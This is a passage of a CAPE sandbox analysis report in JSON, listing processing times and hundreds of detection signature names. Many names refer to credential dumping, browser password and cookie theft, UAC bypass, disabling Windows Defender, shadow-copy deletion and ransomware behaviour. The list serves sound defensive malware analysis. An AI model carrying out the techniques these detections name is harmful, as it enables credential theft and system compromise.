{ "statistics": { "processing": [ { "name": "CAPE", "time": 7.239 }, { "name": "AnalysisInfo", "time": 0.003 }, { "name": "BehaviorAnalysis", "time": 0.052 }, { "name": "Debug", "time": 0.0 }, { "name": "NetworkAnalysis", "time": 0.0 }, { "name": "Suricata", "time": 0.0 }, { "name": "UrlAnalysis", "time": 0.0 }, { "name": "script_log_processing", "time": 0.0 }, { "name": "ProcessMemory", "time": 0.0 } ], "signatures": [ { "name": "packer_themida", "time": 0.0 }, { "name": "stealth_network", "time": 0.0 }, { "name": "disable_driver_via_blocklist", "time": 0.0 }, { "name": "disable_driver_via_hvcidisallowedimages", "time": 0.0 }, { "name": "disable_hypervisor_protected_code_integrity", "time": 0.0 }, { "name": "pendingfilerenameoperations_Operations", "time": 0.0 }, { "name": "anomalous_deletefile", "time": 0.0 }, { "name": "antiav_360_libs", "time": 0.0 }, { "name": "antiav_ahnlab_libs", "time": 0.0 }, { "name": "antiav_avast_libs", "time": 0.0 }, { "name": "antiav_bitdefender_libs", "time": 0.0 }, { "name": "antiav_bullgaurd_libs", "time": 0.0 }, { "name": "antiav_emsisoft_libs", "time": 0.0 }, { "name": "antiav_qurb_libs", "time": 0.0 }, { "name": "antiav_servicestop", "time": 0.0 }, { "name": "antiav_apioverride_libs", "time": 0.0 }, { "name": "antidebug_guardpages", "time": 0.0 }, { "name": "antiav_nthookengine_libs", "time": 0.0 }, { "name": "antidebug_outputdebugstring", "time": 0.0 }, { "name": "antidebug_windows", "time": 0.0 }, { "name": "antisandbox_cuckoo", "time": 0.0 }, { "name": "antisandbox_cuckoocrash", "time": 0.0 }, { "name": "antisandbox_foregroundwindows", "time": 0.0 }, { "name": "antisandbox_mouse_hook", "time": 0.0 }, { "name": "antisandbox_sboxie_libs", "time": 0.0 }, { "name": "antisandbox_script_timer", "time": 0.0 }, { "name": "antisandbox_sleep", "time": 0.0 }, { "name": "antisandbox_sunbelt_libs", "time": 0.0 }, { "name": "antisandbox_suspend", "time": 0.0 }, { "name": "antisandbox_unhook", "time": 0.0 }, { "name": "antivm_directory_objects", "time": 0.0 }, { "name": "antivm_generic_disk", "time": 0.0 }, { "name": "antivm_generic_scsi", "time": 0.0 }, { "name": "antivm_generic_services", "time": 0.0 }, { "name": "antivm_generic_system", "time": 0.0 }, { "name": "antivm_checks_available_memory", "time": 0.0 }, { "name": "detect_virtualization_via_recent_files", "time": 0.0 }, { "name": "antivm_vbox_libs", "time": 0.0 }, { "name": "antivm_vmware_events", "time": 0.0 }, { "name": "antivm_vmware_libs", "time": 0.0 }, { "name": "api_spamming", "time": 0.0 }, { "name": "api_uuidfromstringa", "time": 0.0 }, { "name": "bcdedit_command", "time": 0.0 }, { "name": "bootkit", "time": 0.0 }, { "name": "potential_overwrite_mbr", "time": 0.0 }, { "name": "suspicious_ioctl_scsipassthough", "time": 0.0 }, { "name": "browser_needed", "time": 0.0 }, { "name": "firefox_disables_process_tab", "time": 0.0 }, { "name": "regsvr32_squiblydoo_dll_load", "time": 0.0 }, { "name": "uac_bypass_cmstp", "time": 0.0 }, { "name": "uac_bypass_eventvwr", "time": 0.0 }, { "name": "uac_bypass_windows_Backup", "time": 0.0 }, { "name": "dotnet_code_compile", "time": 0.0 }, { "name": "creates_largekey", "time": 0.0 }, { "name": "creates_nullvalue", "time": 0.0 }, { "name": "access_windows_passwords_vault", "time": 0.0 }, { "name": "dump_lsa_via_windows_error_reporting", "time": 0.0 }, { "name": "lsass_credential_dumping", "time": 0.0 }, { "name": "critical_process", "time": 0.0 }, { "name": "cryptopool_domains", "time": 0.0 }, { "name": "dead_connect", "time": 0.0 }, { "name": "dead_link", "time": 0.0 }, { "name": "decoy_document", "time": 0.0 }, { "name": "decoy_image", "time": 0.0 }, { "name": "deletes_consolehost_history", "time": 0.0 }, { "name": "deletes_shadow_copies", "time": 0.0 }, { "name": "deletes_system_state_backup", "time": 0.0 }, { "name": "dep_bypass", "time": 0.0 }, { "name": "dep_disable", "time": 0.0 }, { "name": "disables_mappeddrives_autodisconnect", "time": 0.0 }, { "name": "disables_spdy", "time": 0.0 }, { "name": "disables_wfp", "time": 0.0 }, { "name": "add_windows_defender_exclusions", "time": 0.0 }, { "name": "dll_load_uncommon_file_types", "time": 0.0 }, { "name": "document_script_exe_drop", "time": 0.0 }, { "name": "guloader_apis", "time": 0.0 }, { "name": "driver_load", "time": 0.0 }, { "name": "dynamic_function_loading", "time": 0.0 }, { "name": "encrypted_ioc", "time": 0.0 }, { "name": "exec_crash", "time": 0.0 }, { "name": "process_creation_suspicious_location", "time": 0.0 }, { "name": "exploit_getbasekerneladdress", "time": 0.0 }, { "name": "exploit_gethaldispatchtable", "time": 0.0 }, { "name": "exploit_heapspray", "time": 0.0 }, { "name": "koadic_apis", "time": 0.0 }, { "name": "koadic_network_activity", "time": 0.0 }, { "name": "downloads_from_filehosting", "time": 0.0 }, { "name": "generic_phish", "time": 0.0 }, { "name": "http_request", "time": 0.0 }, { "name": "infostealer_browser", "time": 0.0 }, { "name": "infostealer_browser_password", "time": 0.0 }, { "name": "infostealer_cookies", "time": 0.0 }, { "name": "cryptbot_network", "time": 0.0 }, { "name": "infostealer_keylog", "time": 0.0 }, { "name": "masslogger_artifacts", "time": 0.0 }, { "name": "masslogger_version", "time": 0.0 }, { "name": "purplewave_network_activity", "time": 0.0 }, { "name": "quilclipper_behavior", "time": 0.0 }, { "name": "raccoon_behavior", "time": 0.0 }, { "name": "captures_screenshot", "time": 0.0 }, { "name": "vidar_behavior", "time": 0.0 }, { "name": "injection_createremotethread", "time": 0.0 }, { "name": "injection_explorer", "time": 0.0 }, { "name": "injection_needextension", "time": 0.0 }, { "name": "injection_network_traffic", "time": 0.0 }, { "name": "injection_runpe", "time": 0.0 }, { "name": "injection_rwx", "time": 0.0 }, { "name": "injection_themeinitapihook", "time": 0.0 }, { "name": "resumethread_remote_process", "time": 0.0 }, { "name": "internet_dropper", "time": 0.0 }, { "name": "escalate_privilege_via_named_pipe", "time": 0.0 }, { "name": "ipc_namedpipe", "time": 0.0 }, { "name": "js_phish", "time": 0.0 }, { "name": "js_suspicious_redirect", "time": 0.0 }, { "name": "execute_binary_via_internet_explorer_exporter", "time": 0.0 }, { "name": "execute_binary_via_run_exe_helper_utility", "time": 0.0 }, { "name": "execute_ps_via_syncappvpublishingserver", "time": 0.0 }, { "name": "malicious_dynamic_function_loading", "time": 0.0 }, { "name": "encrypt_pcinfo", "time": 0.0 }, { "name": "encrypt_data_agenttesla_http", "time": 0.0 }, { "name": "encrypt_data_agentteslat2_http", "time": 0.0 }, { "name": "encrypt_data_nanocore", "time": 0.0 }, { "name": "mimics_filetime", "time": 0.0 }, { "name": "amsi_bypass_via_com_registry", "time": 0.0 }, { "name": "access_auto_logons_via_registry", "time": 0.0 }, { "name": "access_boot_key_via_registry", "time": 0.0 }, { "name": "create_suspicious_lnk_files", "time": 0.0 }, { "name": "credential_access_via_windows_credential_history", "time": 0.0 }, { "name": "dll_hijacking_via_microsoft_exchange", "time": 0.0 }, { "name": "dll_hijacking_via_waas_medic_svc_com_typelib", "time": 0.0 }, { "name": "execute_file_downloaded_via_openssh", "time": 0.0 }, { "name": "execute_safe_mode_from_suspicious_process", "time": 0.0 }, { "name": "execute_scripts_via_microsoft_management_console", "time": 0.0 }, { "name": "execute_suspicious_processes_via_windows_mssql_service", "time": 0.0 }, { "name": "execution_from_self_extracting_archive", "time": 0.0 }, { "name": "ip_address_discovery_via_trusted_program", "time": 0.0 }, { "name": "load_dll_via_control_panel", "time": 0.0 }, { "name": "network_connection_via_suspicious_process", "time": 0.0 }, { "name": "potential_location_discovery_via_unusual_process", "time": 0.0 }, { "name": "store_executable_registry", "time": 0.0 }, { "name": "Suspicious_Execution_Via_MicrosoftExchangeTransportAgent", "time": 0.0 }, { "name": "suspicious_java_execution_via_win_scripts", "time": 0.0 }, { "name": "Suspicious_Scheduled_Task_Creation_Via_Masqueraded_XML_File", "time": 0.0 }, { "name": "uses_restart_manager_for_suspicious_activities", "time": 0.0 }, { "name": "modify_desktop_wallpaper", "time": 0.0 }, { "name": "modify_zoneid_ads", "time": 0.0 }, { "name": "move_file_on_reboot", "time": 0.0 }, { "name": "multiple_useragents", "time": 0.0 }, { "name": "network_anomaly", "time": 0.0 }, { "name": "network_bind", "time": 0.0 }, { "name": "network_cnc_https_archive", "time": 0.0 }, { "name": "network_cnc_https_free_webshoting", "time": 0.0 }, { "name": "network_cnc_https_generic", "time": 0.0 }, { "name": "network_cnc_https_temp_urldns", "time": 0.0 }, { "name": "network_cnc_https_opensource", "time": 0.0 }, { "name": "network_cnc_https_pastesite", "time": 0.0 }, { "name": "network_cnc_https_payload", "time": 0.0 }, { "name": "network_cnc_https_serviceinterface", "time": 0.0 }, { "name": "network_cnc_https_socialmedia", "time": 0.0 }, { "name": "network_cnc_https_telegram", "time": 0.0 }, { "name": "network_cnc_https_tempstorage", "time": 0.0 }, { "name": "network_cnc_https_urlshortener", "time": 0.0 }, { "name": "network_cnc_https_useragent", "time": 0.0 }, { "name": "network_cnc_smtps_exfil", "time": 0.0 }, { "name": "network_cnc_smtps_generic", "time": 0.0 }, { "name": "network_dns_idn", "time": 0.0 }, { "name": "network_dns_suspicious_querytype", "time": 0.0 }, { "name": "network_dns_tunneling_request", "time": 0.0 }, { "name": "network_document_http", "time": 0.0 }, { "name": "explorer_http", "time": 0.0 }, { "name": "network_fake_useragent", "time": 0.0 }, { "name": "legitimate_domain_abuse", "time": 0.0 }, { "name": "network_tor", "time": 0.0 }, { "name": "office_com_load", "time": 0.0 }, { "name": "office_dotnet_load", "time": 0.0 }, { "name": "office_mshtml_load", "time": 0.0 }, { "name": "office_vb_load", "time": 0.0 }, { "name": "office_wmi_load", "time": 0.0 }, { "name": "office_cve2017_11882", "time": 0.0 }, { "name": "office_cve2017_11882_network", "time": 0.0 }, { "name": "office_cve_2021_40444", "time": 0.0 }, { "name": "office_cve_2021_40444_m2", "time": 0.0 }, { "name": "office_flash_load", "time": 0.0 }, { "name": "office_postscript", "time": 0.0 }, { "name": "office_suspicious_processes", "time": 0.0 }, { "name": "office_write_exe", "time": 0.0 }, { "name": "persistence_via_autodial_dll_registry", "time": 0.0 }, { "name": "persistence_autorun", "time": 0.0 }, { "name": "persistence_autorun_tasks", "time": 0.0 }, { "name": "persistence_bootexecute", "time": 0.0 }, { "name": "persistence_registry_script", "time": 0.0 }, { "name": "powershell_network_connection", "time": 0.0 }, { "name": "powershell_download", "time": 0.0 }, { "name": "powershell_request", "time": 0.0 }, { "name": "createtoolhelp32snapshot_module_enumeration", "time": 0.0 }, { "name": "enumerates_running_processes", "time": 0.0 }, { "name": "process_interest", "time": 0.0 }, { "name": "process_needed", "time": 0.0 }, { "name": "mass_data_encryption", "time": 0.0 }, { "name": "ransomware_file_modifications", "time": 0.0 }, { "name": "ransomware_message", "time": 0.0 }, { "name": "nemty_network_activity", "time": 0.0 }, { "name": "nemty_note", "time": 0.0 }, { "name": "sodinokibi_behavior", "time": 0.0 }, { "name": "stop_ransomware_registry", "time": 0.0 }, { "name": "blackrat_apis", "time": 0.0 }, { "name": "blackrat_network_activity", "time": 0.0 }, { "name": "blackrat_registry_keys", "time": 0.0 }, { "name": "dcrat_behavior", "time": 0.0 }, { "name": "karagany_system_event_objects", "time": 0.0 }, { "name": "rat_luminosity", "time": 0.0 }, { "name": "rat_nanocore", "time": 0.0 }, { "name": "netwire_behavior", "time": 0.0 }, { "name": "obliquerat_network_activity", "time": 0.0 }, { "name": "orcusrat_behavior", "time": 0.0 }, { "name": "trochilusrat_apis", "time": 0.0 }, { "name": "reads_self", "time": 0.0 }, { "name": "recon_beacon", "time": 0.0 }, { "name": "recon_programs", "time": 0.0 }, { "name": "recon_systeminfo", "time": 0.0 }, { "name": "accesses_recyclebin", "time": 0.0 }, { "name": "remcos_shell_code_dynamic_wrapper_x", "time": 0.0 }, { "name": "script_created_process", "time": 0.0 }, { "name": "script_network_activity", "time": 0.0 }, { "name": "suspicious_js_script", "time": 0.0 }, { "name": "javascript_timer", "time": 0.0 }, { "name": "secure_login_phishing", "time": 0.0 }, { "name": "securityxploded_modules", "time": 0.0 }, { "name": "get_clipboard_data", "time": 0.0 }, { "name": "sets_autoconfig_url", "time": 0.0 }, { "name": "spoofs_procname", "time": 0.0 }, { "name": "stack_pivot", "time": 0.0 }, { "name": "stack_pivot_file_created", "time": 0.0 }, { "name": "stack_pivot_process_create", "time": 0.0 }, { "name": "set_clipboard_data", "time": 0.0 }, { "name": "stealth_childproc", "time": 0.0 }, { "name": "stealth_file", "time": 0.0 }, { "name": "stealth_timeout", "time": 0.0 }, { "name": "stealth_window", "time": 0.0 }, { "name": "queries_keyboard_layout", "time": 0.0 }, { "name": "terminates_remote_process", "time": 0.0 }, { "name": "user_enum", "time": 0.0 }, { "name": "virus", "time": 0.0 }, { "name": "neshta_files", "time": 0.0 }, { "name": "neshta_regkeys", "time": 0.0 }, { "name": "webmail_phish", "time": 0.0 }, { "name": "persists_dev_util", "time": 0.0 }, { "name": "spawns_dev_util", "time": 0.0 }, { "name": "alters_windows_utility", "time": 0.0 }, { "name": "overwrites_accessibility_utility", "time": 0.0 }, { "name": "Potential_Lateral_Movement_Via_SMBEXEC", "time": 0.0 }, { "name": "potential_WebShell_Via_ScreenConnectServer", "time": 0.0 }, { "name": "uses_Microsoft_HTML_Help_Executable", "time": 0.0 }, { "name": "wiper_zeroedbytes", "time": 0.0 }, { "name": "wmi_create_process", "time": 0.0 }, { "name": "wmi_script_process", "time": 0.0 }, { "name": "deletes_files", "time": 0.0 }, { "name": "drops_files", "time": 0.0 }, { "name": "reads_files", "time": 0.0 }, { "name": "writes_files", "time": 0.0 }, { "name": "antianalysis_tls_section", "time": 0.0 }, { "name": "antivirus_clamav", "time": 0.0 }, { "name": "antivirus_virustotal", "time": 0.0 }, { "name": "bad_certs", "time": 0.0 }, { "name": "bad_ssl_certs", "time": 0.0 }, { "name": "banker_zeus_p2p", "time": 0.0 }, { "name": "banker_zeus_url", "time": 0.0 }, { "name": "binary_yara", "time": 0.0 }, { "name": "bot_athenahttp", "time": 0.0 }, { "name": "bot_dirtjumper", "time": 0.0 }, { "name": "bot_drive", "time": 0.0 }, { "name": "bot_drive2", "time": 0.0 }, { "name": "bot_madness", "time": 0.0 }, { "name": "family_proxyback", "time": 0.0 }, { "name": "flare_capa_antianalysis", "time": 0.0 }, { "name": "flare_capa_collection", "time": 0.0 }, { "name": "flare_capa_communication", "time": 0.0 }, { "name": "flare_capa_compiler", "time": 0.0 }, { "name": "flare_capa_datamanipulation", "time": 0.0 }, { "name": "flare_capa_executable", "time": 0.0 }, { "name": "flare_capa_hostinteraction", "time": 0.0 }, { "name": "flare_capa_impact", "time": 0.0 }, { "name": "flare_capa_lib", "time": 0.0 }, { "name": "flare_capa_linking", "time": 0.0 }, { "name": "flare_capa_loadcode", "time": 0.0 }, { "name": "flare_capa_malwarefamily", "time": 0.0 }, { "name": "flare_capa_nursery", "time": 0.0 }, { "name": "flare_capa_persistence", "time": 0.0 }, { "name": "flare_capa_runtime", "time": 0.0 }, { "name": "flare_capa_targeting", "time": 0.0 }, { "name": "log4shell", "time": 0.0 }, { "name": "mimics_extension", "time": 0.0 }, { "name": "network_country_distribution", "time": 0.0 }, { "name": "network_cnc_http", "time": 0.0 }, { "name": "network_ip_exe", "time": 0.0 }, { "name": "network_dga", "time": 0.0 }, { "name": "network_dga_fraunhofer", "time": 0.0 }, { "name": "network_dyndns", "time": 0.0 }, { "name": "network_excessive_udp", "time": 0.0 }, { "name": "network_http", "time": 0.0 }, { "name": "network_icmp", "time": 0.0 }, { "name": "network_irc", "time": 0.0 }, { "name": "network_open_proxy", "time": 0.0 }, { "name": "network_questionable_http_path", "time": 0.0 }, { "name": "network_questionable_https_path", "time": 0.0 }, { "name": "network_smtp", "time": 0.0 }, { "name": "network_torgateway", "time": 0.0 }, { "name": "origin_langid", "time": 0.0 }, { "name": "origin_resource_langid", "time": 0.0 }, { "name": "overlay", "time": 0.0 }, { "name": "packer_unknown_pe_section_name", "time": 0.0 }, { "name": "packer_aspack", "time": 0.0 }, { "name": "packer_aspirecrypt", "time": 0.0 }, { "name": "packer_bedsprotector", "time": 0.0 }, { "name": "packer_confuser", "time": 0.0 }, { "name": "packer_enigma", "time": 0.0 }, { "name": "packer_entropy", "time": 0.0 }, { "name": "packer_mpress", "time": 0.0 }, { "name": "packer_nate", "time": 0.0 }, { "name": "packer_nspack", "time": 0.0 }, { "name": "packer_smartassembly", "time": 0.0 }, { "name": "packer_spices", "time": 0.0 }, { "name": "packer_themida", "time": 0.0 }, { "name": "packer_titan", "time": 0.0 }, { "name": "packer_upx", "time": 0.0 }, { "name": "packer_vmprotect", "time": 0.0 }, { "name": "packer_yoda", "time": 0.0 }, { "name": "pdf_annot_urls_checker", "time": 0.0 }, { "name": "polymorphic", "time": 0.0 }, { "name": "punch_plus_plus_pcres", "time": 0.0 }, { "name": "procmem_yara", "time": 0.0 }, { "name": "recon_checkip", "time": 0.0 }, { "name": "static_authenticode", "time": 0.0 }, { "name": "invalid_authenticode_signature", "time": 0.0 }, { "name": "static_dotnet_anomaly", "time": 0.0 }, { "name": "static_java", "time": 0.0 }, { "name": "static_pdf", "time": 0.0 }, { "name": "static_pe_anomaly", "time": 0.0 }, { "name": "pe_compile_timestomping", "time": 0.0 }, { "name": "static_pe_pdbpath", "time": 0.0 }, { "name": "static_rat_config", "time": 0.0 }, { "name": "static_versioninfo_anomaly", "time": 0.0 }, { "name": "suricata_alert", "time": 0.0 }, { "name": "suspicious_html_body", "time": 0.0 }, { "name": "suspicious_html_name", "time": 0.0 }, { "name": "suspicious_html_title", "time": 0.0 }, { "name": "volatility_devicetree_1", "time": 0.0 }, { "name": "volatility_handles_1", "time": 0.0 }, { "name": "volatility_ldrmodules_1", "time": 0.0 }, { "name": "volatility_ldrmodules_2", "time": 0.0 }, { "name": "volatility_malfind_1", "time": 0.0 }, { "name": "volatility_malfind_2", "time": 0.0 }, { "name": "volatility_modscan_1", "time": 0.0 }, { "name": "volatility_svcscan_1", "time": 0.0 }, { "name": "volatility_svcscan_2", "time": 0.0 }, { "name": "volatility_svcscan_3", "time": 0.0 }, { "name": "whois_create", "time": 0.0 }, { "name": "accesses_mailslot", "time": 0.0 }, { "name": "accesses_netlogon_regkey", "time": 0.0 }, { "name": "accesses_public_folder", "time": 0.0 }, { "name": "accesses_sysvol", "time": 0.0 }, { "name": "writes_sysvol", "time": 0.0 }, { "name": "adds_admin_user", "time": 0.0 }, { "name": "adds_user", "time": 0.0 }, { "name": "overwrites_admin_password", "time": 0.0 }, { "name": "antianalysis_detectfile", "time": 0.001 }, { "name": "antianalysis_detectreg", "time": 0.004 }, { "name": "modify_attachment_manager", "time": 0.0 }, { "name": "antiav_detectfile", "time": 0.001 }, { "name": "antiav_detectreg", "time": 0.018 }, { "name": "antiav_srp", "time": 0.0 }, { "name": "antiav_whitespace", "time": 0.0 }, { "name": "antidebug_devices", "time": 0.0 }, { "name": "antiemu_windefend", "time": 0.0 }, { "name": "antiemu_wine_reg", "time": 0.0 }, { "name": "antisandbox_cuckoo_files", "time": 0.0 }, { "name": "antisandbox_fortinet_files", "time": 0.0 }, { "name": "antisandbox_joe_anubis_files", "time": 0.0 }, { "name": "antisandbox_sboxie_mutex", "time": 0.0 }, { "name": "antisandbox_sunbelt_files", "time": 0.0 }, { "name": "antisandbox_threattrack_files", "time": 0.0 }, { "name": "antivm_bochs_keys", "time": 0.0 }, { "name": "antivm_generic_bios", "time": 0.0 }, { "name": "antivm_generic_diskreg", "time": 0.001 }, { "name": "antivm_hyperv_keys", "time": 0.0 }, { "name": "antivm_parallels_keys", "time": 0.001 }, { "name": "antivm_vbox_devices", "time": 0.0 }, { "name": "antivm_vbox_files", "time": 0.001 }, { "name": "antivm_vbox_keys", "time": 0.002 }, { "name": "antivm_vmware_devices", "time": 0.0 }, { "name": "antivm_vmware_files", "time": 0.0 }, { "name": "antivm_vmware_keys", "time": 0.001 }, { "name": "antivm_vmware_mutexes", "time": 0.0 }, { "name": "antivm_vpc_files", "time": 0.0 }, { "name": "antivm_vpc_keys", "time": 0.001 }, { "name": "antivm_vpc_mutex", "time": 0.0 }, { "name": "antivm_xen_keys", "time": 0.001 }, { "name": "asyncrat_mutex", "time": 0.0 }, { "name": "gulpix_behavior", "time": 0.0 }, { "name": "ketrican_regkeys", "time": 0.0 }, { "name": "okrum_mutexes", "time": 0.0 }, { "name": "banker_cridex", "time": 0.0 }, { "name": "geodo_banking_trojan", "time": 0.001 }, { "name": "banker_spyeye_mutexes", "time": 0.0 }, { "name": "banker_zeus_mutex", "time": 0.0 }, { "name": "bitcoin_opencl", "time": 0.0 }, { "name": "accesses_primary_patition", "time": 0.0 }, { "name": "direct_hdd_access", "time": 0.0 }, { "name": "enumerates_physical_drives", "time": 0.0 }, { "name": "physical_drive_access", "time": 0.0 }, { "name": "bot_russkill", "time": 0.0 }, { "name": "browser_addon", "time": 0.0 }, { "name": "chromium_browser_extension_directory", "time": 0.0 }, { "name": "browser_helper_object", "time": 0.0 }, { "name": "browser_security", "time": 0.0 }, { "name": "browser_startpage", "time": 0.0 }, { "name": "ie_disables_process_tab", "time": 0.0 }, { "name": "odbcconf_bypass", "time": 0.0 }, { "name": "squiblydoo_bypass", "time": 0.0 }, { "name": "squiblytwo_bypass", "time": 0.0 }, { "name": "bypass_firewall", "time": 0.0 }, { "name": "checks_uac_status", "time": 0.0 }, { "name": "uac_bypass_cmstpcom", "time": 0.0 }, { "name": "uac_bypass_delegateexecute_sdclt", "time": 0.0 }, { "name": "uac_bypass_fodhelper", "time": 0.0 }, { "name": "cape_extracted_content", "time": 0.0 }, { "name": "carberp_mutex", "time": 0.0 }, { "name": "clears_logs", "time": 0.0 }, { "name": "cmdline_obfuscation", "time": 0.0 }, { "name": "cmdline_switches", "time": 0.0 }, { "name": "cmdline_terminate", "time": 0.0 }, { "name": "cmdline_forfiles_wildcard", "time": 0.0 }, { "name": "cmdline_http_link", "time": 0.0 }, { "name": "cmdline_long_string", "time": 0.0 }, { "name": "cmdline_reversed_http_link", "time": 0.0 }, { "name": "long_commandline", "time": 0.0 }, { "name": "powershell_renamed_commandline", "time": 0.0 }, { "name": "copies_self", "time": 0.0 }, { "name": "credwiz_credentialaccess", "time": 0.0 }, { "name": "enables_wdigest", "time": 0.0 }, { "name": "vaultcmd_credentialaccess", "time": 0.0 }, { "name": "file_credential_store_access", "time": 0.0 }, { "name": "file_credential_store_write", "time": 0.0 }, { "name": "kerberos_credential_access_via_rubeus", "time": 0.0 }, { "name": "registry_credential_dumping", "time": 0.0 }, { "name": "registry_credential_store_access", "time": 0.0 }, { "name": "registry_lsa_secrets_access", "time": 0.0 }, { "name": "comsvcs_credentialdump", "time": 0.0 }, { "name": "cryptomining_stratum_command", "time": 0.0 }, { "name": "cypherit_mutexes", "time": 0.0 }, { "name": "darkcomet_regkeys", "time": 0.0 }, { "name": "datop_loader", "time": 0.0 }, { "name": "deepfreeze_mutex", "time": 0.0 }, { "name": "deletes_executed_files", "time": 0.0 }, { "name": "disables_app_launch", "time": 0.0 }, { "name": "disables_auto_app_termination", "time": 0.0 }, { "name": "disables_appv_virtualization", "time": 0.0 }, { "name": "disables_backups", "time": 0.0 }, { "name": "disables_browser_warn", "time": 0.0 }, { "name": "disables_context_menus", "time": 0.0 }, { "name": "disables_cpl_disable", "time": 0.0 }, { "name": "disables_crashdumps", "time": 0.0 }, { "name": "disables_event_logging", "time": 0.0 }, { "name": "disables_folder_options", "time": 0.0 }, { "name": "disables_notificationcenter", "time": 0.0 }, { "name": "disables_power_options", "time": 0.0 }, { "name": "disables_restore_default_state", "time": 0.0 }, { "name": "disables_run_command", "time": 0.0 }, { "name": "disables_smartscreen", "time": 0.0 }, { "name": "disables_startmenu_search", "time": 0.0 }, { "name": "disables_system_restore", "time": 0.0 }, { "name": "disables_uac", "time": 0.0 }, { "name": "disables_wer", "time": 0.0 }, { "name": "disables_windows_defender", "time": 0.0 }, { "name": "disables_windows_defender_logging", "time": 0.0 }, { "name": "removes_windows_defender_contextmenu", "time": 0.0 }, { "name": "windows_defender_powershell", "time": 0.0 }, { "name": "disables_windows_file_protection", "time": 0.0 }, { "name": "disables_windowsupdate", "time": 0.0 }, { "name": "disables_winfirewall", "time": 0.0 }, { "name": "adfind_domain_enumeration", "time": 0.0 }, { "name": "domain_enumeration_commands", "time": 0.0 }, { "name": "andromut_mutexes", "time": 0.0 }, { "name": "downloader_cabby", "time": 0.0 }, { "name": "phorpiex_mutexes", "time": 0.0 }, { "name": "protonbot_mutexes", "time": 0.0 }, { "name": "driver_filtermanager", "time": 0.0 }, { "name": "dropper", "time": 0.0 }, { "name": "dll_archive_execution", "time": 0.0 }, { "name": "lnk_archive_execution", "time": 0.0 }, { "name": "script_archive_execution", "time": 0.0 }, { "name": "excel4_macro_urls", "time": 0.0 }, { "name": "escalate_privilege_via_ntlm_relay", "time": 0.0 }, { "name": "spooler_access", "time": 0.0 }, { "name": "spooler_svc_start", "time": 0.0 }, { "name": "mapped_drives_uac", "time": 0.0 }, { "name": "hides_recycle_bin_icon", "time": 0.0 }, { "name": "apocalypse_stealer_file_behavior", "time": 0.0 }, { "name": "arkei_files", "time": 0.0 }, { "name": "azorult_mutexes", "time": 0.0 }, { "name": "infostealer_bitcoin", "time": 0.001 }, { "name": "cryptbot_files", "time": 0.0 }, { "name": "echelon_files", "time": 0.0 }, { "name": "infostealer_ftp", "time": 0.006 }, { "name": "infostealer_im", "time": 0.004 }, { "name": "infostealer_mail", "time": 0.001 }, { "name": "masslogger_files", "time": 0.0 }, { "name": "poullight_files", "time": 0.0 }, { "name": "purplewave_mutexes", "time": 0.0 }, { "name": "quilclipper_mutexes", "time": 0.0 }, { "name": "qulab_files", "time": 0.0 }, { "name": "qulab_mutexes", "time": 0.0 }, { "name": "asyncrat_mutex", "time": 0.0 }, { "name": "Evade_Execution_Via_ASPNet_Compiler", "time": 0.0 }, { "name": "Evade_Execute_Via_DeviceCredentialDeployment", "time": 0.0 }, { "name": "Evade_Execution_Via_Filter_Manager_Control", "time": 0.0 }, { "name": "Evade_Execution_Via_Intel_GFXDownloadWrapper", "time": 0.0 }, { "name": "execute_binary_via_appvlp", "time": 0.0 }, { "name": "execute_binary_via_pcalua", "time": 0.0 }, { "name": "Execute_Binary_Via_OpenSSH", "time": 0.0 }, { "name": "execute_binary_via_pcalua", "time": 0.0 }, { "name": "Execute_Binary_Via_PesterPSModule", "time": 0.0 }, { "name": "Execute_Binary_Via_ScriptRunner", "time": 0.0 }, { "name": "execute_binary_via_ttdinject", "time": 0.0 }, { "name": "Execute_Binary_Via_VisualStudioLiveShare", "time": 0.0 }, { "name": "Execute_Msiexec_Via_Explorer", "time": 0.0 }, { "name": "execute_remote_msi", "time": 0.0 }, { "name": "execute_suspicious_powershell_via_runscripthelper", "time": 0.0 }, { "name": "execute_suspicious_powershell_via_sqlps", "time": 0.0 }, { "name": "Indirect_Command_Execution_Via_ConsoleWindowHost", "time": 0.0 }, { "name": "Perform_Malicious_Activities_Via_Headless_Browser", "time": 0.0 }, { "name": "Register_DLL_Via_CertOC", "time": 0.0 }, { "name": "Register_DLL_Via_MSIEXEC", "time": 0.0 }, { "name": "Register_DLL_Via_Odbcconf", "time": 0.0 }, { "name": "Scriptlet_Proxy_Execution_Via_Pubprn", "time": 0.0 }, { "name": "ie_martian_children", "time": 0.0 }, { "name": "office_martian_children", "time": 0.0 }, { "name": "mimics_icon", "time": 0.0 }, { "name": "masquerade_process_name", "time": 0.001 }, { "name": "mimikatz_modules", "time": 0.0 }, { "name": "ms_office_cmd_rce", "time": 0.0 }, { "name": "mount_copy_to_webdav_share", "time": 0.0 }, { "name": "potential_protocol_tunneling_via_legit_utilities", "time": 0.0 }, { "name": "potential_protocol_tunneling_via_qemu", "time": 0.0 }, { "name": "suspicious_execution_via_dotnet_remoting", "time": 0.0 }, { "name": "modify_certs", "time": 0.0 }, { "name": "dotnet_clr_usagelog_regkeys", "time": 0.0 }, { "name": "modify_hostfile", "time": 0.0 }, { "name": "modify_oem_information", "time": 0.0 }, { "name": "modify_security_center_warnings", "time": 0.0 }, { "name": "modify_uac_prompt", "time": 0.0 }, { "name": "network_dns_blockchain", "time": 0.0 }, { "name": "network_dns_opennic", "time": 0.0 }, { "name": "network_dns_paste_site", "time": 0.0 }, { "name": "network_dns_reverse_proxy", "time": 0.0 }, { "name": "network_dns_temp_file_storage", "time": 0.0 }, { "name": "network_dns_temp_urldns", "time": 0.0 }, { "name": "network_dns_url_shortener", "time": 0.0 }, { "name": "network_dns_doh_tls", "time": 0.0 }, { "name": "suspicious_tld", "time": 0.0 }, { "name": "network_tor_service", "time": 0.0 }, { "name": "office_code_page", "time": 0.0 }, { "name": "office_addinloading", "time": 0.0 }, { "name": "office_perfkey", "time": 0.0 }, { "name": "office_macro", "time": 0.0 }, { "name": "changes_trust_center_settings", "time": 0.0 }, { "name": "disables_vba_trust_access", "time": 0.0 }, { "name": "office_macro_autoexecution", "time": 0.0 }, { "name": "office_macro_ioc", "time": 0.0 }, { "name": "office_macro_malicious_prediction", "time": 0.0 }, { "name": "office_macro_suspicious", "time": 0.0 }, { "name": "rtf_aslr_bypass", "time": 0.0 }, { "name": "rtf_anomaly_characterset", "time": 0.0 }, { "name": "rtf_anomaly_version", "time": 0.0 }, { "name": "rtf_embedded_content", "time": 0.0 }, { "name": "rtf_embedded_office_file", "time": 0.0 }, { "name": "rtf_exploit_static", "time": 0.0 }, { "name": "office_security", "time": 0.0 }, { "name": "office_anomalous_feature", "time": 0.0 }, { "name": "office_dde_command", "time": 0.0 }, { "name": 